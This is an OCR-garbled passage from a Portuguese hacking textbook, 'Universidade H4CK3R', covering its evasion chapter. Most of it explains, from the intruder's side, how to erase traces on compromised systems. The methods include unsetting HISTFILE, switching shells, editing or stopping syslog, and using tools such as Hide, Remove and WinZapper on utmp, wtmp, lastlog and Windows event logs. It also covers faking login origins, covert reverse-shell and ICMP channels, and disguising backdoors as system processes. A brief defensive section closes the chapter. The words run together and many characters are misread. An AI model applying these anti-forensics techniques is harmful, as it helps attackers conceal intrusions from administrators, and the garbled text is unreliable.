depiranha"paraqueoswannabehackersataquem.Normalmente,sãosistemasfracamenteprotegidos,
comfalhasintencionaisesistemassilenciososdedetecçãodeintrusos.MuitosIDSsinclusivedesviam
silenciosamenteointrusoparaoshoneypotssemqueelespercebam.Alémdamarcaçãocerrada,quandoa
presaéaparentementefácil,oinvasortorna-sedescuidado.
13381
Ataque,defesaecontra-ataque:EvasãoI

Universidade3aano
RegistrodeeventosUnix
Encaremososfatos:mesmotendopadrões,protocolosenormasemcomum,os
Unicessãodiferentesentresi.Cadasaborpossuiumtipodistintodesistemade
arquivos,hierarquiadediretórios,codificaçãodecaracteres,sintaxedoshellna-
tivo,conjuntodecomandospadrão...Háinclusivecomandosque,mesmopossu-
indoomesmonomeemtodasasvariedades,fabricanteseversõesUnix,possuem
sintaxediferente-ps,routee,mesmo,o1ssãodoisexemplosclássicos.Osiste-
maderegistrodeeventosnãoseria,portanto,imuneaessasdiferenças.
Éimpossívellistaremumlivrocomoestetodosostiposeparticularidades
delogsnasdiversasversõesdossabores.Utilizaremos,então,osistemaLinux
comomodeloparaexemplificarumasessãode"cirurgia"noslogs.Sealgum
scriptkiddieestiverlendoestecapítulo,provavelmentepulouesteparágrafo
evaitomaradescriçãoabaixocomoreceitauniversalparaapagamentode
seusrastros.Nossaintenção,entretanto,éoutra:mostraroquevocêprecisa
procurar,nãoonde,enemcomo...
Aprimeiracoisaquedeveserverificadaéohistóricodecomandosdousuá-
rio.Nãoéexatamenteumlog;antesdisso,éumalistadecomandosjáemitidos
queficaàdisposiçãodousuárioparaquenãoprecisemserdigitadosnova-
mente.Issoevitatrabalhorepetitivoparaooperador-e,comoefeitocolateral,
dáaoadministradorumaformadesaberoqueousuárioandafazendo...
Nemtodososshellsimplementamumhistóricodecomandos,ecadaum
guardaohistóricoemumarquivoelocaldiferente.Apenasatítulodeexemplo,
umsistemaLinuxnormalmenteusaaversãoGNUdoBoumeShell,oBash.Esse
interpretadordecomandosguardaohistóricodetudooquefoidigitado(in-
clusivesemsucesso)noarquivo/home/usuário/.bash_history.Éumarquivo
detextopuro,portanto,bastariaeditá-Ioparaesconderseusrastros.Umama-
neiramaisefetiva,entretanto,seriasimplesmentedesativaravariáveldesiste-
maHISTFILE,queindicaondeoscomandosdevemserarmazenados.Paratan-
to,bastaemitirunsetHISTFILE.Pronto!Apartirdaí,nadamaisseráregistrado
(nemoprópriounset!)Essedeveriaseroprimeirocomandoaserfeito,masa
maioriados"invasores"esquece...ounãosabe...
EmUnicesquenãousemBash,umaoutramaneiraé,simplesmente...trocar
deshell!Épossível(emuitoprovável)queoshellpadrãopossuahistórico,eos
demaisnão.Portanto,sevocêconseguiuumacontaeoshellpadrãoéoBoume
Shell(prompt$)simplesmentemude-oparaoCShelldigitandocsh.Seoshell
padrãoéjustamenteoCShell(prompt%),mudeparaoBoumeShell,digitando
sh.Arazãoparausarshecshéquequalquerumdosoutros(bash,zsh,ksh)têm
rotinasdehistóricodecomandoscompletamenteimplementadas.
Paraajudaradesviarsuspeitas,umatacantemaisousadopoderiadesviaros
comandos(oucopiá-Ios)doseuprópriohistóricoparaodeoutrousuário.
Mesmoqueosistemaestejasobsuspeita,duranteumtemporazoávelossantos
pagarãopelospecadores.
13391
]Ataque,defesaecontra-ataque:Evasão

IUniversidadeH4CK3RI
Depoisdeenganarohistóricodoshell,temosdeapagarosrastrosnoslogs
dosistema.NamaioriadosUnix,odaemonresponsávelpeloregistrodoslogs
desistemaéosyslogd.EmqualquerUnixinvadido,portanto,éinteressante
pesquisarnosarquivosdeconfiguraçãododaemon(que,noLinux,ficaem
/etc/syslog.conf-masissovariaemoutrosUnices)everificarquaisosno-
mesdosarquivosderegistrodeeventoseondeestãogravados.
Comousuáriocomum(nãoroot)emumConectivaLinux9,oarquivo/etc/
syslog.confmostra:
$cat/etc/syslog.conf
#LogalIkernelmessagestotheconsole.
#LoggingmucheIsecluttersupthescreen.
#kern.* /dev/console
#Loganything(exceptmail)ofleveIinfoorhigher.
#Don'tlogprivateauthenticationmessages!
*.info;mail.none;authpriv.none /var/log/messages
#Theauthprivfilehasrestrictedaccess.
authpriv.* /var/log/secure
#LogalIthemailmessagesinoneplace.
mail.*
/var/log/maillog
#Everybodygetsemergencymessages,pluslogthemonanother
#machine.
*.emerg
*
#SavemailandnewserrorsofleveIerrandhigherina
#specialfile.
uucp,news.crit /var/log/spooler
#Savebootmessagesalsotoboot.log
locaI7.* /var/log/boot.log
Obviamente,cadaumdosarquivosindicadosnosyslogdpossuiumafunção
diferente.Todasaslinhasmarcadascomum#sãoconsideradascomocomentá-
rioseignoradas.Ocampodaesquerdadefineumasériederegrasderegistro
aseremaplicadasàsmensagens.Oscamposdadireitaindicamemquaisarqui-
vososregistrostêmdesergravados.Observeque,nosyslog.confacima,o
ftltrokem..estádirecionadopara/dev/conso1e-ouseja,asmensagensdo
kemelseriamecoadasnoterminal,casoalinhaestivessedescomentada.Como
sepodever,dispositivostambémpodemserusadosparalogging,alémdos
arquivoscomuns.
1340I
Ataque,defesaecontra-ataque:EvasãoI

Universidade3aano
Peloquepodemosobservardosyslog.conf,temos,em/var/log,
~/var/log/messages:registratodasasmensagensdenívelinformativodosistema.
~/var/log/secure:registraacessoaarquivoseprocessosrestritos.
~/var/log/maillog:registramensagensdee-mailenviadaserecebidas.
~/var/log/spooler:registraerrosemtrocasdeMail,UUCPeNews.
~/var/logiboot.1og:registraeventoseerrosduranteoboot.
Novamentelembrando:essaslocalizaçõessãoparaoConectivaLinux9111
ProcurenopróprioUnixinvadidoquaisaslocalizaçõesreaisdosarquivos.É
possívelqueonúmeroeafunçãodelessejadiferente:podehaverumarquivo
apenascomtodososlogs,oupodemhaver,porexemplo,umarquivoseparado
paraUUCPeoutroparae-mail.Scriptkiddiesnormalmenteusamferramentas
escriptsdeapagamentodelogsdeumsistemaemoutroe,emvezdeseescon-
derem,acabamcriandomaismensagensdeerronoslogsealertantooadminis-
tradormaiscedodoqueoesperado.Olheantesdeagirefaçaacoisacerta.
Umavezdescobertosquaisosarquivosresponsáveispeloregistrodeeven-
tosdoUnixsobataque,podemospassaràediçãodeles.Apesardeexistirem
ferramentasqueaplicamcriptografiafortenosarquivosdelog,agrandemai-
oriadossistemasaindausamobomevelhotextopuroparagravá-los.Oque
significaqueohackerpodeusaseueditordetextospreferido(emacs,vi,joe,
pico...)paraeditá-Iomanualmente.Osautoresrecomendamsempreeditar
manualmenteosarquivos,evitandoquesujeira,errosouimprecisõesnosscripts
queofazemautomaticamentepossamcolocartudoaperder.
AindanoCL9,vamosaodiretório/var!logevejamosoqueháporlá:
$ls
XFree86.
o.10g boot.log.4
XFree86.o.10g.oldcron
apache cron.1
boot.10g cron.2
boot.10g.1 cron.3
boot.log.2 cron.4
boot.log.3 cups
Observe:alémdosarquivosdosyslogd,odiretório/var!logcontémosregistros
deoutrosprogramaseservidoresquerodamnamáquina,comoApache,Samba,
CUPSeoXFree86.Convémverificaroslogsdetodoseles,umavezquealguma
açãosua(intencionalounão)podeterdeixadomarcasemqualquerdeles.
Ocupemos-nosprimeirodoscincoarquivosdosyslogd.Aindacomousuário
comum,abra(comseueditordetextosfavorito)oarquivoboot.1og.Nelees-
tãoosserviçossendoexecutados,osmódulosdokemelcarregadoseosservi-
doresquesãoiniciadosefinalizadospeloinetd.Notequeháoutros,chamados
boot.1og.1,boot.1og.2,etc,queguardamlogsantigos.Agoratenteescrever
qualquercoisaesalvaroarquivo(semprecomousuáriocomum).Permissão
negada!Osoutrosarquivos-maillog,messages,secureespooler-sequer
dãopermissãodeleituraausuárioscomuns.
1341I
IAtaque,defesaecontra-ataque:Evasão
dmesg mai11og.2messages.4 netconf.10g.3 secure.4vtund
htmlaccess.log
mai110g.3 mysql.log samba spooler wtmp
iptraf mai11og.4mysql.log.l.gz scrollkeeper.log spooler.l
wtmp.1
kdm.10g messages nagios secure spooler.2
lastlog messages.l netconf.10g secure.1 spoo1er.3
mai110g messages.2netconf.10g.1 secure.2 spoo1er.4
maillog.l messages.3netconf.10g.2 secure.3 uucp

IUniversidadeH4CK3R I
Logue-secomoroot(ou,emumsistemainvadido,consigaacessoarootusandobuffer
overflowououtratécnicaqualquer)eabraosarquivos.Verifiqueassintaxesdeles.
MaillogregistraaatividadedeSMIP,IMAPePOPlocais(sendmail,postfix,qmail,imapd,
pop3d...).Messagesémuitoimportante:registraasmensagensentreprocessoseen-
treeleseokeme1.Secure,poroutrolado,registramensagensdeacessoprivilegiadoa
arquivoseprocessos.Porsuavez,spoolerguardaasmensagensoriundasdeprogra-
masqueusamosserviçosdespool(mail,uucp,news,etc).Mesmoquevocênãotenha
mexidocomoservidordeSMfPouPOp,éprudenteverificartambémosarquivos/
var!log/mailloge/var!log/spooletercertezadeque,inadvertidamente,vocênãodis-
paroualgumprocessoquetenhaalteradoologoOmesmovaleparaqualquerproces-
soouarquivo,portantoumcuidadogeralnologéprimordial.
Voltandoao/etc/syslogd.conf,alinha
#Everybodygetsemergencymessages,pluslogthemonanother
#machine.
*.emerg
indicaquequaisquermensagensdeemergênciadosistemaserãoecoadasatodos
oslogseatodososusuários.Cuidadocomisso:seosistemadetectarcoisasestra-
nhasacontecendo,épossívelquetodososusuáriossejamavisados-portanto,uma
boaidéiaépararoserviçosyslogdoureiniciá-locomessalinhacomentada.Consulte
aspáginasdemanualdosyslogdedosyslog.confnoUnixafetadoparadetalhes.
Mas,alémdoqueémonitoradopelosyslogd,háoutrosarquivosderealimpor-
tância.Umdeleséosistemautmp/wtmp/lastlog.Outmpéumsubsistemaque
registraquemestáconectadonopresentemomento.Quandoousuário(ouo
administrador)emiteumcomandowho,ocomandovailerem/var/run/utmp
asinformaçõessobretodasascontasemuso,emquaisterminaiselasestãoe,se
forumaconexãoremota,oWdeorigemdaconexão.Porexemplo,nomomento
emqueestaslinhasestãosendoescritas,ocomandowhoinforma:
henriquepts/O Feb1614:42
henriquepts/1 Feb1616:07
Entretanto,eupossodizeraocomandowhoemqualarquivoolhar.Seeu
emitirocomandowho/var/run/utmp,oresultadoseráomesmo:whosem
argumentossemprelêoarquivoutmp.Maseseeupedirparawhoconsultar
em/var/log/wtmp?
henrique pts/3
henrique pts/3
james pts/O
root tty1
henrique tty2
henrique tty3
root tty4
root pts/O
root pts/1
Jan
Jan
Fev
Fev
Fev
Fev
Fev
Fev
Fev
13421
Ataque,defesaecontra-ataque:Evasão I
*
905:14
905:16
211:50
522:16
522:17
522:23
522:40
522:49
522:52
(192.168.1.229)
(192.168.1.229)

Universidade3aano
oarquivoémuitogrande,entãomostramosapenasalgumaslinhas.Observe:
Nodianovedejaneiro,ousuárioHenriquefezduasconexõesaestamáquina
(que,atítulodecuriosidade,eraa192.168.1.11)apartirdeoutra,a192.168.1.229.
Nodiadoisdefevereiro,ousuárioJameslogou-selocalmentenamáquina,eno
diacincoousuárioHenriquelogou-secomorootváriasvezes.
Ocomandolastfazumcruzamentodeinformaçõesentreosarquivos/var/
log/lastloge/var/log/wtmpemostranatelaasinformaçõesdetalhadasdos
últimosdiassobreostemposdeloginelogoutdecadausuárioemesmode
rebootdamáquina.Ocomandolastlog,poroutrolado,mostraquandocada
umdosusuáriosdosistemalogou-sepelaúltimavez.Umusuáriodesativado
quetenhadadologinonteméumeventoalarmante.
Paraoadministradordesistemas,usaroscomandoslast,lastlogewhopara
verificaro/var/log/wtmpéumamedidatantopreventivacomocorretiva.Por-
tanto,éimperiosoparaocrackerquequerapagarseusvestígiosexcluitodas
asmençõesaelenessesarquivos.Entãonossointrépidoinvasorusaopico(...)
paraeditar,porexemplo,o/var/log/wtmpetemumadesagradávelsurpresa:
oarquivonãoédetextopuro,masbinário!Omesmoocorrecom/var/run/
utmpecom/var/log/lastlog.Então,oquefazer?Desespero...
Conformedissemosantes,háferramentasautomáticasparalimpezadoutmp,
wtmpelastlog.Umadelas(entremuitas)éoHide(www.hoobie.net/security/
exploits/hacking/hide.c).Estepequenoprogramaapagaasentradasdousuário
queoexecutounoarquivoutmp,casoestejaliberadoparaescritaparaaquele
usuário.Obviamentesistemasmodernosnãocometemessatoliceedeixamo
utmpliberadoapenaspararoot,maséumaexcelenteprovadeconceito.
Ocódigo-fontedoprograma,sendopequeno,éfácildeentender.Obviamente
aestaalturaoleitorjádevesaberqueterádecompilaroprograminhapara
queelefuncione.Dependendodosistema,podemsernecessáriasalgumasalte-
rações.NoConectivaLinux9,porexemplo,bastousubstituirtodasasfunções
exit()porexit(O).Nota-seaíqueocandidatoahackerdeveobrigatoriamente
aprenderaprogramar(oupelomenos,a"sevirar")emCeC++.Sevocênão
queraprenderaprogramar,bem,jogueestelivrofora:vocênãoquer,defmiti-
vamente,elevarseuníveltécnico,masapenasaprenderreceitinhasdeataque
simples.Hackersriemdevocês,enquantoisso.
Nomesmositeencontramosoutraferramentamuitofamosa,desenvolvidapelo
nãomenosfamosohackerSimp1eNomad,chamada(puxa...)Remove
(www.hoobie.net/security/exploits/hacking/remove.c).Comela,épossívelremo-
verquaisquerusuáriosdequalquerumdostrêsarquivosutmp,wtmpelastlog.Foi
desenvolvidaparaAIX,maspodeserfacilmentecompilada(comoestáoucommodi-
ficaçõessimples)emqualquersabordeUnix,incluindolinuxe{Free,Open,Net}BSD.
Alémderemoverosregistrosreferentesaqualquerusuário(enãoapenasaoque
executaraferramenta,comooHide),oRemovepermitequesealtereoúltimousu-
árioquefezlogineolocaldelogin(IP,seremoto;ttyoupst,selocal).
13431
IAtaque,defesaecontra-ataque:Evasão

IUniversidadeH4CK3RI
Compileetesteosdoisprogramasemsuamáquinadetestes.Façavárias
experiências,comoaumentarediminuironíveldepermissõesdosseusutmp,
wtmpelastlogerodarasduasferramentas.Noteque,numataquereal,oinva-
sornormalmenteprecisadeumshellrootpararodaroRemove,emboranão
precise,necessariamente,detantosprivilégiosparaatacarosistema.Depois
debrincarcomesses,procureporoutrostiposdeferramentas.Nomesmuito
comunssãoCloak,Cloak2(ouCloak-2)ZapeLogWEdit.Muitosrootkitspos-
suemferramentas(embutidasounão)paraediçãodessesarquivos.Veja,por
exemplo,adocumentaçãodoKnarkedoIrk5.Maslembre-se:nuncauseapeça
redondanoburacoquadrado!PesquisesobreaferramentacorretaparaoUnix
queestásendoatacado.
Casonenhumadessasferramentasestejadisponívelnomomento,algunstru-
quespodemajudá-Ioapermanecerescondidoporalgumtempo.Porexemplo,
quandoseacessaosistemaporumaconta"hackeada",provavelmenteoacesso
vaificargravadonoarquivolastlog,comoIPdeconexãoouonomededomínio
correspondente.Paraapagarisso(aomenosnolastlog),umavezfeitoologin
comsucesso,rodeocomandorloginnamesmaconta.Pronto!Agora,oúltimo
logindestacontaterásidolocal,enoarquivolastlogaparecerá"fromlocalhost".
Faltaenganarocomandowho.Umavezlogadonosistema(edepoisdeenga-
narolastlog...),useocomandologineforneça,novamente,ousuárioesenha
destaconta.DependendodoUnix(edequantoeleestáatualizado...),issoes-
conderáaorigemdaconexão,fazendoocomandowhopensarquealguém
estáconectadolocalmente.
Paraterminar,procurepeloslogsespecíficosdosservidoreseaplicativos
querodamnocomputadorinvadido.Alémdoslogsdesistema,procurepelos
doApacheoudoservidordeFTP'CadasistemaesaborUnixpossuemdaemons
deversõeseprocedênciasdiferentesecomumprocedimentodiversodelogging.
Nãovamosdiscorrersobretodasaspossibilidadesaqui,poistomariaoespaço
devárioslivroscomoeste;maséimperativoqueoleitorpesquisesobreisso
noambienteinvadido.Éjustamenteporissoqueaobservaçãoéimportante,
antesdefazerqualquercoisa.
Comotarefaparacasa,experimenteverificaroslogsdoApacheedoSquid
emsuamáquinadetestes.Experimentesimplesmenteconectar-seaelaapartir
deoutramaquinacomoumusuárioregular(porexemplo,façaumaconexão
SSHaela,use-acomoproxycomoSquidouacesseumapáginaHTMLde
testes).Depois,sigatodosospassosdeinvasãovistosnoscapítulosanteriores,
desderodarumnmapcontraamáquinaatérealmenteconseguirrootpor
algummétodoealteraralgumacoisa.Observeatentamenteosarquivosdelog
evejaoqueacontece.
Últimadica:www.hoobie.net.
13441
Ataque,defesaecontra-ataque:Evasão[

RegistrodeeventosnoWindows NT/2k/XP
ComovimosnocapítulosobreplataformasWindows,todoofuncionamento
doWindowsébaseadoemeventos.Portanto,nadamaislógicoqueseuslogs
tambémregistremosdiversoseventosocorridosnosistema.Umserviçoespe-
cialchamadoEventLogdácontadorecado.Eosproblemasjácomeçamporele
mesmo:oslogssósãocriadosseasrotinasdeauditoriadoWindowsestiverem
ativadas.Comonemtodososadministradoresofazem,háaíumgrandefurode
segurançaaproveitadoporcrackers.
Oseventossãoregistradosemduasetapas.Emprimeirolugar,sãoarmazena-
dosemarquivostemporárioschamadosAPPLICATION.LOG,SYSTEM.LOGe
SECURITY.LOG(noWindowsXP,essestrêsarquivostornaramdezenasdeles
emC\WINDOWSouC\WINN1).Depoisdealgumtempo,taisdadossãoguar-
dadosemtrêsarquivosde[mitivos:SecEvent.Evt,SysEvent.EvteAppEvent.Evt,
todosguardadosemC\WINDOWS\SYSTEM32. Sãoarquivosbinários,assim
comooutmpdoUnix,eportantonecessitamdeaplicativosespecíficospara
seremeditados.Cadaumdeles,respectivamente,registraumconjuntodiferen-
tedeeventos:segurança(tentativasdeloginfracassadasounão,acessoaarqui-
vosnãoautorizados,etc),funcionamentodosistema(inicialização,terminação
efalhasemserviçosedrivers)efuncionamentodeaplicativos(inicialização,
terminaçãoefalhasemprogramasdouserspace).
Damesmaformacomonoregistro,quepodeserconsultadoealteradocom
ousodoRegEdit,oseventosdosistemapodemservisualizados(masnãoalte-
rados)comoEventViewer.Paraacessá-Io,diqueemIniciarlExecutarerodeo
comandoeventvwr.Atelaapresentadaseráparecidacomesta:
Observe:forçamosal-
gunsacessos~d~jad~i
comumusuanonao-pn-i
vilegiadoedepoisanali-i
samososlogsemum
WmdowsXP.
Paraalteraroslogs,
deve-seusaroutrasfer-
ramentas,umavezque
oEventVieweréape-
nasumvisualizador.
Háalgumasdisponí-
veisemsitesde
hackers,masépreciso
fazeralgumapesquisa
paratal.OsiteNTSecurity(ntsecurity.nu)ofereceumaferramentachamada
WinZapper,quepermitealteraroslogsdeservidoresWindowsNTe2000.
~Audlto,las"
~Audl'o,las"
~Audl'o,las".i-~Audlto,las"
~Audlto,l.s"
~Audl'odas"
~Audl'",las"
~Audl'o,l.s"
#Audl'",la".
#Audlto,lac"
#Audlto,lac"
#Audl'o,lac"
#Audl'",lac"
,fi'Audlto,l.c"
#Audl'oda".
#Audl'o,l.c"
24/612003
24/612003
24/612003
-
24/612003
24/612003
24/612003
24/612003
24/612003
24/612003
24/612003
24/612003
24/612003
24/612003
24/612003
24/612003
241612003
19:39:03
19:39:03
19:39:03
IIIIID
19:38:55
19:38:55
19:38:55
19:38:50
19:38:50
19:38:50
19:38:50
19:38:50
19:38:50
19:38:45
19:38:45
19:38:45
19:38:45
Universidade3aano
Securl',Logondecon'a
Securl',LogonllogoFF
Secu,l'yLogondecon'a
",_IiIi!ffitI.....-
Securl',Logondecon'a
Securl'yLogonllogoFF
Secu,l'yLogondecon'a
Secu,ltyLogonllogoFF
Securl',Logondecon'a
Securl'yLogonllogoff
Securl',Usodep,lvllo"
Securl',LogonllogoFf
Secu,l',Logondecon'.
Secu,l',Monl'ora,ãod"
Securl'yMonl'ora,ãod"
5ecurl',Monl'ora,ãod"
Secu,l'y
1345I
IAtaque,defesaecontra-ataque:Evasão

IUniversidadeH4CK3R I
Escondendosuasconexões
Jádiscutimosanterionuentesobrecomotornarsuasconexõesindetectáveis.
Começandocomosrootldts,quecriamumambienteartificiale"mentem"so-
breascomunicaçõesexistentes,passamospormétodosdeembutirascone-
xõesemoutraseacabamosporusartécnicasquepenuitem,inclusive,comuni-
caçõessemconexão.Vamosapenasrelembraralgumasdastécnicasvistas,reu-
nidasaquicomoumaespéciede"revisão".
Paracomeçar,existemastécnicasdeLayer-Ovistasnocapítuloanterioreque
usamsniffmg+spoofingpararecebercomandosnamáquinavítima.Adicional-
mente,usamo"estofo"ecamposinúteisnoscabeçalhosTCP/IPparaenviar
dadosaohackerapartirdocomputadorinvadido.Ohackertemdeseposicionar
nomeiodofluxodedadosparapoder"esnifar"ospacotessemperdernada,
umavezquenãosãodestinadosfonualmenteaele.
Hádoiscapítulos,vimoscomousaroNetcatpara"empurrar"umshellcom
umaconexãovindadedentroparafora.Dessaforma,oadministrador,mesmo
queverifiqueaconexãocomnetstatououtraferramenta,veráumainocente
conexãooriginadadedentrodarede.Háferramentasquevãomaislongee
mascaramessaconexãocomosefosseumarequisiçãoHTTp,POp,FTPoumes-
moSMTPvindadedentro.Namáquinadohacker,háumprogramaquesimula
oservidordesejado(HTTp'porexemplo)emanda,travestidosderespostaHTTP,
oscomandosaseremexecutadosnavítima.UsarHTTPérealmenteeficaze
imoral,poisaporta80estarásempreabertaparaqueusuáriosinternosfaçam
conexõesàWeb.
Háaindaduasmaneirasadicionais(entremuitasoutras)quedeixamoscomo
trabalhoparacasa.Épossível,emmáquinasUnix,"ricochetear"umX-terminal
paraamáquinadohacker,casooservidorXestejarodandoesuaporta(nor-
malmentea6000)estejaabertaenãofiltrada.Etambémépossíveltrocarin-
formaçõesentreamáquinadohackereavítima(sejaWindows,Unix,Macintosh,
Novell...)usandotráfegoICMP.Dica:Lold.
Amaneiradeescondertráfegodependedecadacaso.Háredesemquea
comunicaçãoviaICMPseriaimpraticável,poisofirewallbloqueiaessetipode
tráfego.Maséimportantequeohackerquequeiramanterumcanalsegurode
comunicaçãocomosbackdoorsdesuaspresasimp1ementealgumtipodeca-
muflagem.Hojeemdia,osadministradoresnãosãotãodespreocupadosquan-
toatráfegosuspeitocomoháquatrooucincoanos.
Umaúltimadica:rodeseusbackdoorscomnomesdosistema,deformaa
apareceremcomoprocessoscomuns.Porexemplo,noWindowsumservidor
B02Kpodeserrenomeadoparaexplorer.exe.NoUnix,poderiachamar-se
inetdoulpd.
13461
Ataque,defesaecontra-ataque:Evasão[

Universidade3aano
DefesaeContra-ataque
Algumasmedidaspodemsertomadasparaimpedirou,pelomenos,dificul-
tarotrabalhodecamuflagemdoshackersmaliciosos.
Apagamentodelogs
Emprimeirolugar,certifique-seperiodicamentedequeaauditoriadosiste-
maestejarealmenterodando,eoslogssendocriados.EmmáquinasUnix,veri-
fiqueosyslogd;noWindows,oEventLog.Háhackersque,emvezdeeditaros
logs,desligamaauditoriaedeixamregistrosfalsosequenãomudamnunca.
Administradores"desligados"ealgunsverificadoresdeintegridadedearquivos
sãoenganadoscomessatécnicasimplesegrosseira.
Emsegundolugar,verifiquesequemtempermissãodeescritaoumesmo
leituradoslogsrealmentedeveriapossuí-Ia.Apesardeóbvio,estecuidadoge-
ralmenteédeixadodeladomesmoporadministradoresexperientes.Utilizea
políticadamáximarestriçãopossível.Nessecaso,sempre,menosémais.
Aplicarcriptografiaéaterceiraprovidênciaóbvia.Aocontráriodasduas
anteriores,normalmenteoslogsnãosãocriptografadosporpadrão,comfer-
ramentasdoprópriosistema.Emvezdisso,sãonecessáriosprogramasdeter-
ceirosparaatarefa.Cadasistemaoperacionalpossuidiversaspossibilidades.
Contateseufornecedorparaobtermaisinformações.
Outramaneiramuitoeficaz(masnãotãoóbvia)deprotegeroslogségravá-
losemmídiasapenasdeleitura.CD-Rssãoespecialmenteúteisnessahora.É
possívelquehajaproblemasdedesempenhonoacessoadisco,masosdrives
maismodernosjápossuemvelocidadeaceitávelparaatarefa.Ofatoéqueos
hackersnãoconseguirãoalterarologporqueissonãoéfisicamentepossível.
Prepararumservidorespecialparaarmazenarosregistrosdeeventosde
todososoutroscomputadorestambéméumartifíciointeressante.Issocria
diversascamadasdedificuldadeparaoinvasorchegaraté,oumesmosaber
ondeestão,osverdadeirosarquivosderegistro.Novamente,contateseuforne-
cedorparaconhecerasopçõesdeservidoresdeloggingdisponíveisparaseu
sistemaoperacional.
Umúltimotruque,quenãobloqueia,masretardaoinvasormaishabilidoso,é
colocaroslogsemlocaisforadopadrãoedeixar,noslocais-padrão,simula-
cros.Emsetratandodekiddies,esseexpedientesimplescriaráaimpressão
falsadeque"limparamabarra",quandonaverdadecontinuamsendo
monitorados.
Camuflagemdeconexoes
Paracomeçar,eemconsonânciacomoquevimosnoscapítulosanteriores,o
invasornãodeveconseguir,deformaalguma,acessoprivilegiadoaosistema.
13471
IAtaque,defesaecontra-ataque:Evasão

IUniversidadeH4CK3R I
Rootouadministrador,esseacessodeveserevitadoaomáximo.Portanto,apli-
queascorreçõesdoseufabricante,mantenhasenhasdifíceis,desativeserviços
nãousados,blábláblá...Avelhafórmuladesempre,quedeveseraplicadaa
qualquersituação.
Conheçaoquevocêestárodando.Saibaosprocessosquepodemeosque
nãodeveriamaparecernalistadetarefas,bemcomoasconexõesquedeveri-
am(ounão)estarestabe1ecidas.Verifique-osperiodicamente,maisdeumavez
pordiaemcasosdesuspeitadeataqueemaisdeumavezporhoracasoo
ataquetenhasidodetectado.
Umaúltimadica:oSnortconseguedetectarcanaisdecomunicaçãobaseados
emICMP.SnortxLoki...jogointeressante.
Umadespedida?2
Bem,chegamosaofmaldenossosestudosformais.Éemocionantevê-Iofor-
madoediplomado.Maslembre-sequesuaeducaçãosobrehackerismonão
terminacomoúltimocapítulo:vejaoquepreparamosparavocênoCD!Além
disso,façatodasasexperiênciasdolivroevisitetodosossitesindicados.E
tambémtestetodasasferramentassugeridas.Vocêveráquesãomuitopoucas,
secomparadoaoquehádisponível.Váatrás!Aprenderaser"hacker"(oucomo
querquevocêchame)éumprocessocontínuo.
Despedimo-nosaqui(lágrimasnosolhos!)eesperamosquepossamosnos
encontrarembreve,emoutrocurso,talvez.
Masmantenhacontatocomseusvelhosprofessores!Mande-nossuassuges-
tões,críticasecolaboraçõesparaestelivro.Todosestãoconvidadosaparticipar.
Escrevamesmo!
Nossoendereço:[email protected].
Enãoesqueçadeacessarnossositeemwww.digerati.com.br/livro
Umgrandeabraço,eatémais.HappyHacking!
2ÉdignodenotaqueestelivrochegouatéaquisemcitarnenhumavezAartedaguerra:SunTzu.Não
hápublicaçãomodernaquenãoseaproveitedessevenerávelexemplodaliteraturaclássica.Osautores
procuraramfugirdolugar-comum,eportantodecidiram(contrariandosugestõesdisparadasdetodosos
lados)nãoincluirnenhumtrechodomilenarcompêndio.Entretanto,olivroémuitobomevaleapenaser
lido,degraçaeon-line,emwww.kimsoft.com/polwar.htm.
3481
Ataque,defesaecontra-ataque:Evasãor